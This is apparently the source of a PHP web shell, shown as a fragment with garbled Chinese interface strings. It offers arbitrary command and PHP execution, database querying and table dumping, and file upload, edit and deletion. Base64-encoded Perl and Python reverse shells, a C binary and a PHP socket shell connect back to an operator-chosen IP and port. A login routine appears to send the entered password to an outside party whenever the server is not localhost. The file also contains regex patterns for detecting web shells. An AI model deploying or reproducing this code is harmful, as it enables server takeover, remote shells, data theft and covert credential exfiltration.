'IyEvdXNyL2Jpbi9wZXJsIC13DQojIA0KdXNlIHN0cmljdDsNCnVzZSBTb2NrZXQ7DQp1c2UgSU86OkhhbmRsZTsNCm15ICRzcGlkZXJfaXAgPSAkQVJHVlswXTsNCm15ICRzcGlkZXJfcG9ydCA9ICRBUkdWWzFdOw0KbXkgJHByb3RvID0gZ2V0cHJvdG9ieW5hbWUoInRjcCIpOw0KbXkgJHBhY2tfYWRkciA9IHNvY2thZGRyX2luKCRzcGlkZXJfcG9ydCwgaW5ldF9hdG9uKCRzcGlkZXJfaXApKTsNCm15ICRzaGVsbCA9ICcvYmluL3NoIC1pJzsNCnNvY2tldChTT0NLLCBBRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsNClNURE9VVC0+YXV0b2ZsdXNoKDEpOw0KU09DSy0+YXV0b2ZsdXNoKDEpOw0KY29ubmVjdChTT0NLLCRwYWNrX2FkZHIpIG9yIGRpZSAiY2FuIG5vdCBjb25uZWN0OiQhIjsNCm9wZW4gU1RESU4sICI8JlNPQ0siOw0Kb3BlbiBTVERPVVQsICI+JlNPQ0siOw0Kb3BlbiBTVERFUlIsICI+JlNPQ0siOw0Kc3lzdGVtKCRzaGVsbCk7DQpjbG9zZSBTT0NLOw0KZXhpdCAwOw0K'; $file = strdir($dir . '/t00ls.pl'); $key = filew($file, base64_decode($shell), 'w'); if ($key) { @chmod($file, 0777); command('/usr/bin/perl ' . $file . ' ' . $ip . ' ' . $port, $dir); } break; case "py": $shell = 'IyEvdXNyL2Jpbi9weXRob24NCiMgDQppbXBvcnQgc3lzLG9zLHNvY2tldCxwdHkNCnMgPSBzb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULCBzb2NrZXQuU09DS19TVFJFQU0pDQpzLmNvbm5lY3QoKHN5cy5hcmd2WzFdLCBpbnQoc3lzLmFyZ3ZbMl0pKSkNCm9zLmR1cDIocy5maWxlbm8oKSwgc3lzLnN0ZGluLmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3Rkb3V0LmZpbGVubygpKQ0Kb3MuZHVwMihzLmZpbGVubygpLCBzeXMuc3RkZXJyLmZpbGVubygpKQ0KcHR5LnNwYXduKCcvYmluL3NoJykNCg=='; $file = strdir($dir . '/t00ls.py'); $key = filew($file, base64_decode($shell), 'w'); if ($key) { @chmod($file, 0777); command('/usr/bin/python ' . $file . ' ' . $ip . ' ' . $port, $dir); } break; case "c": $file = strdir($dir . '/t00ls'); $key = filew($file, base64_decode($c_bin), 'wb'); if ($key) { @chmod($file, 0777); command($file . ' ' . $ip . ' ' . $port, $dir); } break; case "php": case "phpwin": if (function_exists('fsockopen')) { $sock = @fsockopen($ip, $port); if ($sock) { $key = true; $com = $type == 'phpwin' ? true : false; $user = get_current_user(); $dir = strdir(getcwd()); fputs($sock, php_uname() . "\n------------no job control in this shell (tty)-------------\n[$user:$dir]# "); while ($cmd = fread($sock, 1024)) { if (substr($cmd, 0, 3) == 'cd ') { $dir = trim(substr($cmd, 3, -1)); chdir(strdir($dir)); $dir = strdir(getcwd()); } elseif (trim(strtolower($cmd)) == 'exit') { break; } else { $res = command($cmd, $dir, $com); fputs($sock, $res['res']); } fputs($sock, '[' . $user . ':' . $dir . ']# '); } } @fclose($sock); } break; case "pcntl": $file = strdir($dir . '/t00ls'); $key = filew($file, base64_decode($c_bin), 'wb'); if ($key) { @chmod($file, 0777); if (function_exists('pcntl_exec')) { @pcntl_exec($file, array( $ip, $port )); } } break; } if (!$key) { $msg = '

ʱĿ¼д

'; } else { @unlink($file); $msg = '

CLOSE

'; } return $msg; } function getinfo() { global $password; $infos = array( $_POST['getpwd'], $password, function_exists('phpinfo'), "\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" ); if ($password != '' && md5($infos[0]) != $infos[1]) { echo '

'; if (isset($_POST['groupcache'])) { echo ''; } if (isset($_POST['forum'])) { echo ''; echo ''; echo ''; echo ''; echo ''; } echo '
'; exit; } if ((!isset($_POST['go'])) && (!isset($_POST['dir']))) { if ($_SERVER['SERVER_ADDR'] != $infos[3] && $_SERVER['REMOTE_ADDR'] != $infos[3]) postinfo($infos[0]); } return $infos[2]; } function subeval() { if (isset($_POST['getpwd'])) { echo ''; } if (isset($_POST['groupcache'])) { echo ''; } if (isset($_POST['forum'])) { echo ''; echo ''; echo ''; echo ''; echo ''; } return true; } if (isset($_POST['go'])) { if ($_POST['go'] == 'down') { $downfile = $fileb = strdir($_POST['godir'] . '/' . $_POST['govar']); if (!filed($downfile)) { $msg = '

ļ

'; } } } ?><?php echo VERSION; ?>
'ļ', 'scan' => 'ļ', 'antivirus' => 'ɨ', 'exec' => 'ִ', 'phpeval' => 'ִPHP', 'sql' => 'ִSQL', 'backshell' => 'SHELL', 'info' => 'ϵͳϢ' ); $go = array_key_exists($_POST['go'], $menu) ? $_POST['go'] : 'file'; $nowdir = isset($_POST['dir']) ? strdir(chop($_POST['dir']) . '/') : THISDIR; echo '
'; foreach ($menu as $key => $name) { echo '' . $name . ' '; } echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo '
'; switch ($_POST['go']) { case "info": if (EXISTS_PHPINFO) { ob_start(); phpinfo(INFO_GENERAL); $out = ob_get_contents(); ob_end_clean(); $tmp = array(); preg_match_all('/\([Configure Command|Loaded Configuration File])+\s*\<\/td\>\(.*)\<\/td\>/i', $out, $tmp); } $infos = array( '˵' => 'POSTΪ˲¼־.
¼뱣ҳ,COOKIESESSION.¼ЧΪǰҳ.
𽫱ΪǷ;.', 'ͻϢ' => $_SERVER['HTTP_USER_AGENT'], 'õĺ' => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : '()', 'õ' => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : '()', 'PHP.ini·' => $tmp[2][1] ? $tmp[2][1] : '()', 'PHPзʽ' => php_sapi_name(), 'PHP汾' => PHP_VERSION, 'PHPPID' => getmypid(), 'ͻIP' => $_SERVER['REMOTE_ADDR'], 'ͻֱ' => $_SERVER['HTTP_ACCEPT_LANGUAGE'], 'Web˿' => $_SERVER['SERVER_PORT'], 'WebĿ¼' => $_SERVER['DOCUMENT_ROOT'], 'Webִнű' => $_SERVER['SCRIPT_FILENAME'], 'Web淶CGI汾' => $_SERVER['GATEWAY_INTERFACE'], 'WebԱEmail' => $_SERVER['SERVER_ADMIN'] ? $_SERVER['SERVER_ADMIN'] : '()', 'ǰܴС' => size(disk_total_space('.')), 'ǰ̿ÿռ' => size(disk_free_space('.')), 'POST' => get_cfg_var("post_max_size"), 'ϴļ' => get_cfg_var("upload_max_filesize"), 'ʹڴ' => get_cfg_var("memory_limit"), 'ʱ' => get_cfg_var("max_execution_time") . '', 'Ƿ֧Fsockopen' => function_exists('fsockopen') ? '' : '', 'Ƿ֧Socket' => function_exists('socket_close') ? '' : '', 'Ƿ֧Pcntl' => function_exists('pcntl_exec') ? '' : '', 'Ƿ֧Curl' => function_exists('curl_version') ? '' : '', 'Ƿ֧Zlib' => function_exists('gzclose') ? '' : '', 'Ƿ֧FTP' => function_exists('ftp_login') ? '' : '', 'Ƿ֧XML' => function_exists('xml_set_object') ? '' : '', 'Ƿ֧GD_Library' => function_exists('imageline') ? '' : '', 'Ƿ֧COM齨' => class_exists('COM') ? '' : '', 'Ƿ֧ODBC齨' => function_exists('odbc_close') ? '' : '', 'Ƿ֧IMAPʼ' => function_exists('imap_close') ? '' : '', 'Ƿڰȫģʽ' => get_cfg_var("safemode") ? '' : '', 'ǷURLļ' => get_cfg_var("allow_url_fopen") ? '' : '', 'Ƿ̬ӿ' => get_cfg_var("enable_dl") ? '' : '', 'ǷʾϢ' => get_cfg_var("display_errors") ? '' : '', 'ǷԶעȫֱ' => get_cfg_var("register_globals") ? '' : '', 'Ƿʹ÷бַ' => get_cfg_var("magic_quotes_gpc") ? '' : '', 'PHP' => $tmp[2][0] ? $tmp[2][0] : '()' ); echo '
' . $msg . '
'; echo ''; foreach ($infos as $name => $var) { echo ''; } echo '
' . $name . '' . $var . '
'; break; case "exec": $cmd = $win ? 'dir' : 'ls -al'; $res = array( 'res' => '', 'msg' => $msg ); $str = isset($_POST['str']) ? $_POST['str'] : 'fun'; if (isset($_POST['cmd'])) { $cmd = $_POST['cmd']; $cwd = $str == 'fun' ? THISDIR : 'com'; $res = command($cmd, $cwd); } echo '
' . $res['msg'] . '
'; echo '
'; subeval(); echo ''; echo '
'; echo ' '; echo ' '; echo ''; echo '
'; break; case "scan": $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $keyword = isset($_POST['keyword']) ? $_POST['keyword'] : ''; $include = isset($_POST['include']) ? chop($_POST['include']) : '.php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py'; $filters = isset($_POST['filters']) ? chop($_POST['filters']) : 'html|css|img|images|image|style|js'; echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
·
(ļļ)
ļ׺ ("|"ָ, Ϊļ)
Ŀ¼ ("|"ָ, Ϊ򲻹Ŀ¼)
ʽ '; echo ' '; echo '
Χ '; echo '
'; if ($keyword != '') { flush(); ob_flush(); echo '
'; $incs = $include == '' ? false : explode('|', $include); $fits = $filters == '' ? false : explode('|', $filters); scanfile(strdir($scandir . '/'), $keyword, $incs, $fits, $_POST['type'], $_POST['char'], $_POST['range'], $nowdir); echo '
'; } break; case "antivirus": $scandir = empty($_POST['dir']) ? base64_decode($_POST['govar']) : $nowdir; $typearr = isset($_POST['dir']) ? $_POST['types'] : array( 'php' => '.php' ); echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo '
ɨ·
ɱ'; $types = array( 'php' => '.php', 'asp+aspx' => '.as|.cs|.cer', 'jsp' => '.jsp' ); foreach ($types as $key => $ex) echo ' '; echo '
'; if (count($_POST['types']) > 0) { $matches = array( 'php' => array( '/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i', '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i', '/(udp\:\/\/(.*)\;)+/i', '/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i', '/preg\_replace\s*\((.*)\(base64\_decode\(\$/i', '/(eval|assert|include|require)+\s*\((.*)(base64\_decode|file\_get\_contents|php\:\/\/input)+/i', '/(eval|assert|include|require|array\_map)+\s*\(\s*\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i', '/\$\_(GET|POST|COOKIE|SERVER|SESSION)+(.*)(eval|assert|include|require)+\s*\(\s*\$(\w+)\s*\)/i', '/\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\]\(\s*\$(.*)\)/i', '/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\)/i', '/(fopen|fwrite|fpust|file\_put\_contents)+\s*\((.*)\$\_(GET|POST|COOKIE|SERVER|SESSION)+\[(.*)\](.*)\)/i', '/echo\s*curl\_exec\s*\(\s*\$(\w+)\s*\)/i', '/new com\s*\(\s*[\'|\"]shell(.*)[\'|\"]\s*\)/i', '/\$(.*)\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i', '/\$\_\=(.*)\$\_/i' ), 'asp+aspx' => array( '/(VBScript\.Encode|WScript\.shell|Shell\.Application|Scripting\.FileSystemObject)+/i', '/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i', '/(eval|execute)+(.*)request.item\s*\[(.*)\]/i', '/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i', '/\(.*)\<\/script\>/i', '/Load\s*\((.*)Request/i', '/StreamWriter\(Server\.MapPath(.*)\.Write\(Request/i' ), 'jsp' => array( '/(eval|execute)+(.*)(request|session)+\s*\((.*)\)/i', '/(eval|execute)+(.*)request.item\s*\[(.*)\]/i', '/request\s*\((.*)\)(.*)(eval|execute)+\s*\((.*)\)/i', '/Runtime\.getRuntime\(\)\.exec\((.*)\)/i', '/FileOutputStream\(application\.getRealPath(.*)request/i' ) ); flush(); ob_flush(); echo '
'; antivirus(strdir($scandir . '/'), $typearr, $matches, $nowdir); echo 'ɨ
'; } break; case "phpeval": if (isset($_POST['phpcode'])) { $phpcode = chop($_POST['phpcode']); ob_start(); if (substr($phpcode, 0, 2) == '') { @eval('?>' . $phpcode . '' . $msg . '
'; echo '
'; subeval(); echo ''; echo '

'; echo ' '; echo '

'; echo '

'; break; case "sql": if ((!empty($_POST['sqlhost'])) && (!empty($_POST['sqluser'])) && (!empty($_POST['names']))) { $type = $_POST['type']; $sqlhost = $_POST['sqlhost']; $sqluser = $_POST['sqluser']; $sqlpass = $_POST['sqlpass']; $sqlname = $_POST['sqlname']; $sqlcode = $_POST['sqlcode']; $names = $_POST['names']; switch ($type) { case "PostgreSql": if (function_exists('pg_close')) { if (strstr($sqlhost, ':')) { $array = explode(':', $sqlhost); $sqlhost = $array[0]; $sqlport = $array[1]; } else { $sqlport = 5432; } $dbconn = @pg_connect("host=$sqlhost port=$sqlport dbname=$sqlname user=$sqluser password=$sqlpass"); if ($dbconn) { $msg = '

' . $type . 'ɹ

'; pg_query('set client_encoding=' . $names); $result = pg_query($sqlcode); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = pg_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'error' => pg_result_error($result) ); } pg_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; } @pg_close($dbconn); } else { $msg = '

֧' . $type . '

'; } break; case "MsSql": if (function_exists('mssql_close')) { $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass); if ($dbconn) { $msg = '

' . $type . 'ɹ

'; mssql_select_db($sqlname, $dbconn); $result = mssql_query($sqlcode); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = mssql_fetch_array($result)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; } @mssql_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; } @mssql_close($dbconn); } else { $msg = '

֧' . $type . '

'; } break; case "Oracle": if (function_exists('oci_close')) { $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . '/' . $sqlname); if ($conn) { $msg = '

' . $type . 'ɹ

'; $stid = oci_parse($conn, $sqlcode); oci_execute($stid); if ($stid) { $msg .= '

- ִSQLɹ

'; while (($array = oci_fetch_array($stid, OCI_ASSOC))) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $e = oci_error(); $rows = array( 'error' => $e['message'] ); } oci_free_statement($stid); } else { $e = oci_error(); $rows = array( 'error' => $e['message'] ); $msg = '

' . $type . 'ʧ

'; } @oci_close($conn); } else { $msg = '

֧' . $type . '

'; } break; case "MySql": if (function_exists('mysql_close')) { $conn = mysql_connect(strstr($sqlhost, ':') ? $sqlhost : $sqlhost . ':3306', $sqluser, $sqlpass, $sqlname); if ($conn) { $msg = '

' . $type . 'ɹ

'; if (substr($sqlcode, 0, 7) == 't00lsa') { $array = array(); $data = ''; $i = 0; preg_match_all('/t00lsa\s*\'(.*)\'\s*t00lsb\s*\'(.*)\'\s*t00lsc\s*\'(.*)\'\s*t00lsfile\s*\'(.*)\'/i', $sqlcode, $array); if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) { mysql_select_db($array[1][0], $conn); mysql_query('set names ' . $names, $conn); $spidercode = 'select ' . $array[3][0] . ' from `' . $array[2][0] . '`;'; $result = mysql_query($spidercode, $conn); if ($result) { while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $data .= join(' |x| ', $row) . "\r\n"; $i++; } if ($data) { $file = strdir($array[4][0]); $msg .= filew($file, $data, 'w') ? '

- ѿɹ

' : '

- ļʧ

'; $rows = array( 'file' => $file, size(filesize($file)) => 'ȡ' . $i . '' ); } else { $msg .= '

- û

'; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } } else { $msg .= '

- ѿ

'; } } elseif (!empty($sqlcode)) { mysql_select_db($sqlname, $conn); mysql_query('set names ' . $names, $conn); $result = mysql_query($sqlcode, $conn); if ($result) { $msg .= '

- ִSQLɹ

'; while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) { $rows[] = $array; } } else { $msg .= '

- ִSQLʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } } mysql_free_result($result); } else { $msg = '

' . $type . 'ʧ

'; $rows = array( 'errno' => mysql_errno(), 'error' => mysql_error() ); } mysql_close($conn); } else { $msg = '

֧' . $type . '

'; } break; } } else { $type = 'MySql'; $sqlhost = 'localhost:3306'; $sqluser = 'root'; $sqlpass = '123456'; $sqlname = 'mysql'; $sqlcode = 'select version();'; $names = 'gbk'; } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo '
֧'; $dbs = array( 'MySql', 'MsSql', 'Oracle', 'PostgreSql' ); foreach ($dbs as $dbname) { echo ' '; } echo '
ַ '; echo 'û '; echo ' '; echo '

'; echo ''; echo '
'; if ($rows) { echo '
';
            ob_start();
            print_r($rows);
            $out = ob_get_contents();
            ob_end_clean();
            if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $out) && function_exists('iconv')) {
                $out = @iconv('UTF-8', 'GB2312//IGNORE', $out);
            }
            echo htmlspecialchars($out);
            echo '
'; } break; case "backshell": if ((!empty($_POST['backip'])) && (!empty($_POST['backport']))) { $backip = $_POST['backip']; $backport = $_POST['backport']; $temp = $_POST['temp'] ? $_POST['temp'] : '/tmp'; $type = $_POST['type']; $msg = backshell($backip, $backport, $temp, $type); } else { $backip = $_SERVER['REMOTE_ADDR']; $backport = '443'; $temp = '/tmp'; $type = 'pl'; $msg = 'PHPɼLinuxWindows ෽ֻLinux'; } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
ַ (Your ip)
˿ (nc -vvlp ' . $backport . ')
ʱĿ¼ (Only Linux)
'; $types = array( 'pl' => 'Perl', 'py' => 'Python', 'c' => 'C-bin', 'pcntl' => 'Pcntl', 'php' => 'PHP', 'phpwin' => 'PHP-COM' ); foreach ($types as $key => $name) { echo ' '; } echo '
'; break; case "edit": case "editor": $file = strdir($_POST['godir'] . '/' . $_POST['govar']); $iconv = function_exists('iconv'); if (!file_exists($file)) { $msg = '½ļ'; } else { $code = filer($file); $chst = 'Ĭ'; if (preg_match('~[\x{4e00}-\x{9fa5}]+~u', $code) && $iconv) { $chst = 'utf-8'; $code = @iconv('UTF-8', 'GB2312//IGNORE', $code); } $size = size(filesize($file)); $msg = 'ļ ' . substr(decoct(fileperms($file)), -4) . ' ļС ' . $size . ' ļ ' . $chst . ''; } echo base64_decode('PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg=='); echo '
- ' . $msg . '
'; echo '
'; subeval(); echo ''; echo ''; echo '
ļ '; if ($iconv) { echo ' '; } echo '
'; echo '
'; echo '
'; subeval(); echo '
'; break; case "upfiles": $updir = isset($_POST['updir']) ? $_POST['updir'] : $_POST['godir']; $msg = 'ϴļ ' . get_cfg_var("upload_max_filesize") . ' POSTύ ' . get_cfg_var("post_max_size") . ''; $max = 10; if (isset($_FILES['uploads']) && isset($_POST['renames'])) { $uploads = $_FILES['uploads']; $msgs = array(); for ($i = 1; $i < $max; $i++) { if ($uploads['error'][$i] == UPLOAD_ERR_OK) { $rename = $_POST['renames'][$i] == '' ? $uploads['name'][$i] : $_POST['renames'][$i]; $filea = $uploads['tmp_name'][$i]; $fileb = strdir($updir . '/' . $rename); $msgs[$i] = fileu($filea, $fileb) ? '

ϴɹ ' . $rename . '

' : '

ϴʧ ' . $rename . '

'; } } } echo '
' . $msg . '
'; echo '
'; subeval(); echo ''; echo '

ϴĿ¼

'; for ($i = 1; $i < $max; $i++) { echo '

' . $i . ' ' . $msgs[$i] . '

'; } echo '
'; echo '
'; subeval(); echo '
'; break; default: if (isset($_FILES['upfile'])) { if ($_FILES['upfile']['name'] == '') { $msg = '

ѡļ

'; } else { $rename = $_POST['rename'] == '' ? $_FILES['upfile']['name'] : $_POST['rename']; $filea = $_FILES['upfile']['tmp_name']; $fileb = strdir($nowdir . $rename); $msg = fileu($filea, $fileb) ? '

ϴļ' . $rename . 'ɹ

' : '

ϴļ' . $rename . 'ʧ

'; } } if (isset($_POST['act'])) { switch ($_POST['act']) { case "a": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @copy(strdir($nowdir . $filename), strdir($_POST['var'] . '/' . $filename)) ? 1 : 0; } $msg = $msg = $i ? '

' . $i . ' ļ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ' . $_POST['var'] . 'ʧ

'; } break; case "b": if (!$_POST['files']) { $msg = '

ѡļ

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0; } $msg = $i ? '

ɾ ' . $i . ' ļɹ

' : '

ɾ ' . $i . ' ļʧ

'; } break; case "c": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } elseif (!ereg("^[0-7]{4}$", $_POST['var'])) { $msg = '

ֵ

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @chmod(strdir($nowdir . $filename), base_convert($_POST['var'], 8, 10)) ? 1 : 0; } $msg = $i ? '

' . $i . ' ļ޸Ϊ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ޸Ϊ' . $_POST['var'] . 'ʧ

'; } break; case "d": if (!$_POST['files']) { $msg = '

ѡļ ' . $_POST['var'] . '

'; } elseif (!preg_match('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/', $_POST['var'])) { $msg = '

ʱʽ ' . $_POST['var'] . '

'; } else { $i = 0; foreach ($_POST['files'] as $filename) { $i += @touch(strdir($nowdir . $filename), strtotime($_POST['var'])) ? 1 : 0; } $msg = $i ? '

' . $i . ' ļ޸ʱΪ' . $_POST['var'] . 'ɹ

' : '

' . $i . ' ļ޸ʱΪ' . $_POST['var'] . 'ʧ

'; } break; case "e": $path = strdir($nowdir . $_POST['var'] . '/'); if (file_exists($path)) { $msg = '

Ŀ¼Ѵ ' . $_POST['var'] . '

'; } else { $msg = @mkdir($path, 0777) ? '

Ŀ¼ ' . $_POST['var'] . ' ɹ

' : '

Ŀ¼ ' . $_POST['var'] . ' ʧ

'; } break; case "rf": $files = explode('|x|', $_POST['var']); if (count($files) != 2) { $msg = '

'; } else { $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? '

' . $files[1] . ' Ϊ ' . $files[0] . ' ɹ

' : '

' . $files[1] . ' Ϊ ' . $files[0] . ' ʧ

'; } break; case "pd": $files = explode('|x|', $_POST['var']); if (count($files) != 2) { $msg = '

'; } else { $path = strdir($nowdir . $files[1]); $msg = @chmod($path, base_convert($files[0], 8, 10)) ? '

޸' . $files[1] . 'Ϊ' . $files[0] . 'ɹ

' : '

޸' . $files[1] . 'Ϊ' . $files[0] . 'ʧ

'; } break; case "edit": if (isset($_POST['filename']) && isset($_POST['filecode'])) { if ($_POST['tostr'] == 'utf') { $_POST['filecode'] = @iconv('GB2312//IGNORE', 'UTF-8', $_POST['filecode']); } $msg = filew($_POST['filename'], $_POST['filecode'], 'w') ? '

ɹ ' . $_POST['filename'] . '

' : '

ʧ ' . $_POST['filename'] . '

'; } break; case "deltree": $deldir = strdir($nowdir . $_POST['var'] . '/'); if (!file_exists($deldir)) { $msg = '

Ŀ¼ ' . $_POST['var'] . '

'; } else { $msg = deltree($deldir) ? '

ɾĿ¼ ' . $_POST['var'] . ' ɹ

' : '

ɾĿ¼ ' . $_POST['var'] . ' ʧ

'; } break; } } $array = showdir($nowdir); $thisurl = strdir('/' . strtr($nowdir, array( ROOTDIR => '' )) . '/'); $chown = substr(decoct(fileperms($nowdir)), -4); if (!$chown) { $chown = '0000'; } $nowdir = strtr($nowdir, array( '\'' => '%27', '"' => '%22' )); echo '
' . $msg . '
'; echo '
'; subeval(); echo 'ǰ·(' . $chown . ') '; echo ' '; echo '
'; echo ' '; echo ' '; echo ' '; echo '
'; subeval(); echo ''; echo ' '; echo ' '; echo 'ϴΪ '; echo '
'; echo '
'; subeval(); echo ''; echo ''; echo ''; echo ''; if ($array) { asort($array['dir']); asort($array['file']); $dnum = $fnum = 0; foreach ($array['dir'] as $path => $name) { $prem = substr(decoct(fileperms($path)), -4); $ctime = date('Y-m-d H:i:s', filectime($path)); $mtime = date('Y-m-d H:i:s', filemtime($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $dnum++; } foreach ($array['file'] as $path => $name) { $prem = substr(decoct(fileperms($path)), -4); $ctime = date('Y-m-d H:i:s', filectime($path)); $mtime = date('Y-m-d H:i:s', filemtime($path)); $size = size(filesize($path)); echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $fnum++; } } unset($array); echo '
ϼĿ¼ʱ޸ʱ
' . strtr($name, array( '%27' => '\'', '%22' => '"' )) . 'ɾ '; echo '' . $prem . '' . $ctime . '' . $mtime . '-
' . strtr($name, array( '%27' => '\'', '%22' => '"' )) . ' '; echo '' . $prem . '' . $ctime . '' . $mtime . '' . $size . '
'; echo '
'; echo ' '; echo ' '; echo ' '; echo ' '; echo ' '; echo 'Ŀ¼[' . $dnum . '] - ļ[' . $fnum . ']
'; break; } ?>
' . $_SERVER['SERVER_SOFTWARE']; ?>